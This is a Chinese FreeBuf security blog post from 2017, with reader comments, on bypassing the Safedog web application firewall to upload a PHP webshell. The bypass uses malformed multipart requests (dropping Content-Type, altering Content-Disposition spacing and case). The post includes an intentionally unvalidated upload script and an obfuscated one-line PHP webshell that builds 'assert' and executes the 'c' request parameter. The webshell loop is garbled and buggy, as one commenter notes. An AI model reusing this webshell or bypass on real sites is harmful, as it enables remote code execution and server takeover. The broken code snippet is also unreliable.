绕过网站安全狗拦截，上传Webshell技巧总结（附免杀PHP一句话）

*本文原创作者：1_2，本文属FreeBuf原创奖励计划，未经许可禁止转载

这篇文章我介绍一下我所知道的绕过网站安全狗上传WebShell的方法。

思路是：修改HTTP请求，构成畸形HTTP请求，然后绕过网站安全狗的检测。

废话不多说，切入正题。。。。

1、实验环境：

Windows Server 2003、 Apache/2.4.18、PHP/5.3.29、网站安全狗(Apache版)V3.5.12048

2、用于文件上传的PHP源码：

$path = dirname(__FILE__) . '/upload/';

$rand = rand(0,30);

move_uploaded_file($_FILES["file"]["tmp_name"],$path . $rand . $_FILES["file"]["name"]);

echo "File Path:" . $path . $rand . $_FILES["file"]["name"] . "
";

echo "OK";

?>

因为此次实验的目的是绕过网站安全狗，所以PHP源码上我没做任何检测，把上传的文件直接放在upload目录下。

3、先看一下正常的HTTP请求：

很明显，文件名为”yijuhua.php”被拦截。。。。

4、尝试%00截断：

很明显，失败了。。。

5、修改HTTP请求，构造畸形HTTP请求

(1)删除实体里面的Conten-Type字段：

绕过网站安全狗的拦截，成功上传WebShell。。。

(2)删除Content-Disposition字段里的空格：

(3)修改Content-Disposition字段值的大小写：

6、菜刀连接一句话：

到此，上传WebShell结束，各位看明白了吗？

7、免杀PHP一句话：

/*

PHP一句话木马

assert($string)

*/

$arr = array('a','s','s','e','r','t');

$func = '';

for($i=0;$i

$func .= $func . $arr[$i];

}

$func($_REQUEST['c']);

?>

8、修复漏洞：

出现这种情况，我认为是网站安全狗在开发时没有考虑到畸形HTTP请求，而Apache却兼容畸形HTTP请求，所以能够上传成功。

*本文原创作者：1_2（QQ:965207103），本文属FreeBuf原创奖励计划，未经许可禁止转载

1_2 1篇文章 等级：1级

 

   |

  |

• 上一篇：看我是如何跟羊毛党战斗的之我也变成羊毛党
• 下一篇：本篇已是最新文章

这些评论亮了

• 
  111 回复
  很久之前在土司看到过，所以你肯定不是原创
  ) 39 ( 亮了

发表评论

已有 34 条评论

• 

  daliang  2017-01-16 回复 1楼

  666

  亮了( 0)
• 

  111  2017-01-16 回复 2楼

  很久之前在土司看到过，所以你肯定不是原创

  亮了( 39)
• 卡巴基佬  (1级)  2017-01-16 回复 3楼

  小白没看懂

  亮了( 1)
• 

  科科  2017-01-16 回复 4楼

  小伙子，够胆你就来测试iis版本

  亮了( 0)
• safedog_sec  (1级)  2017-01-16 回复 5楼

  谢谢@1_2同学的文章。欢迎各位同学到http://security.safedog.cn提交产品问题

  亮了( 2)
• 

  黑无常  (1级)  2017-01-16 回复 6楼

  亲，你tm骗鬼呢？你那样绝对过不了最新版安全狗，再说了https://www.t00ls.net/thread-37820-1-1.html你有问过他的感受吗？

  亮了( 1)
  • 

    哎哟  2017-01-16 回复

    @ 黑无常  大牛，你又弄新号进去了啊？

    亮了( 0)
    • 

      黑无常  (1级)  2017-01-16 回复

      @ 哎哟 这回不惹事，咋们安安静静看大神写帖子。

      亮了( 0)
• 

  科科  2017-01-16 回复 7楼

  而且你这是 网站安全狗(Apache版)V3.5.12048 老版本……

  亮了( 0)
• 乖乖马先森  (1级) 黑掉妹子电脑然后窃取裸照。。。。。  2017-01-16 回复 8楼

  拜托可否多讲点原理，随便贴几张图片神马的。。。。。。。

  亮了( 0)
• 弹幕免疫者郭敬明  (1级)  2017-01-16 回复 9楼

  收集点绕WAF容易吗，又给爆出来了？

  亮了( 0)
• 

  薛定谔的note7  2017-01-16 回复 10楼

  mark 一句话免杀

  亮了( 0)
• 

  t00ls  2017-01-16 回复 11楼

  这要是发t00ls早被踩死了

  亮了( 0)
• 

  旋风_Shaw  2017-01-16 回复 12楼

  辣鸡，就知道抄。

  亮了( 2)
• 

  鬼魅羊羔  (4级) 网络尖刀的小屌丝一枚。  2017-01-16 回复 13楼

  这个文章很久之前就看过了。。

  而且这里所谓的免杀一句话，早就过时了。。

  反正我的网马监控是拦截并自动删除了。。安全狗就更不用说了。。

  

  亮了( 0)
• 

  addison66  (3级) 大奶萌妹请私聊我  2017-01-16 回复 14楼

  单看图片清晰度就知道了

  亮了( 0)
  • tonybreak  (3级)  2017-01-16 回复

    @ addison66  http://image.3001.net/images/20170112/14841970677342.jpg
    可以看大图~

    亮了( 0)
    • 

      addison66  (3级) 大奶萌妹请私聊我  2017-01-16 回复

      @ tonybreak  谢谢

      亮了( 0)
• 

  fuckbaidu  2017-01-16 回复 15楼

  $func($_REQUEST['c']);

  这种都不杀，那安全狗可以去死了

  亮了( 2)
• 

  藤真  (2级) 欢迎访问独自等待博客 http://www.waitalon...  2017-01-16 回复 16楼

  不管是哪位写的，感谢分离。

  亮了( 0)
• 

  dalao大屌  2017-01-16 回复 17楼

  怎么说呢，作者贡献的精神值得鼓励，但是从文章上来看给人的感觉就是，作者本身积累也没有多少，至于免杀一句话，多搞几行代码，随便变化一下 一大把的免杀， 文章毫无亮点， 个人认为单纯只是为了秀一秀，让我惊讶的是，这种文章FB 竟然还有现金奖励。

  亮了( 4)
• csharp  (1级)  2017-01-16 回复 18楼

  应该是
  $func .= $arr[$i];
  或
  $func = $func . $arr[$i];
  吧

  亮了( 0)
• 

  啦啦啦  2017-01-16 回复 19楼

  感谢作者搬运文章

  亮了( 3)
• 

  红茶不加糖  (2级)  2017-01-16 回复 20楼

  图片截图清晰度看得我想哭，一点儿也不像原创

  亮了( 0)
• 

  softbug  (7级) 四川建设网安全工程师  2017-01-16 回复 21楼

  方法很多，而且还有更变态的，大家自己低调用就可以了。 但就不告诉你，就不告诉你，就不告诉你

  亮了( 1)
• 

  lr3800_  (2级)  2017-01-16 回复 22楼

  @ 111 打脸

  亮了( 0)
• 

  终级评论师  2017-01-17 回复 23楼

  公布出来就不免杀系列。

  亮了( 0)
• 

  adwada  2017-01-17 回复 24楼

  UFO驾到~

  亮了( 0)
• 

  FBI  2017-01-17 回复 25楼

  国内能不能发点上档次文章

  亮了( 0)
• 

  破軍  (1级)  2017-01-17 回复 26楼

  Mark This!

  亮了( 0)
• 501867060  (1级)  2017-01-17 回复 27楼

  过时啦，再说还是 网站狗apache版，没啥人用的！！！作者很无聊赚稿费是吗？

  亮了( 0)
• 

  看客  2017-01-17 回复 28楼

  看到Apache的时候我就想到了：我的WafBypass之道 虽然这个是sql 但是也有提到Apache畸形请求兼容。

  亮了( 0)
• 

  FreeBu_小哲  (1级) 关注网络安全，致力于编程开发  2017-01-17 回复 29楼

  来几个asp过D盾的姿势吧

  亮了( 0)
• 

  raven  (1级)  2017-01-17 回复 30楼

  之前乌云也有过bypass Apache版本的，后来被谁说了一句怎么不bypass iis版本的，结果没过几天人还真bypass了iis版本的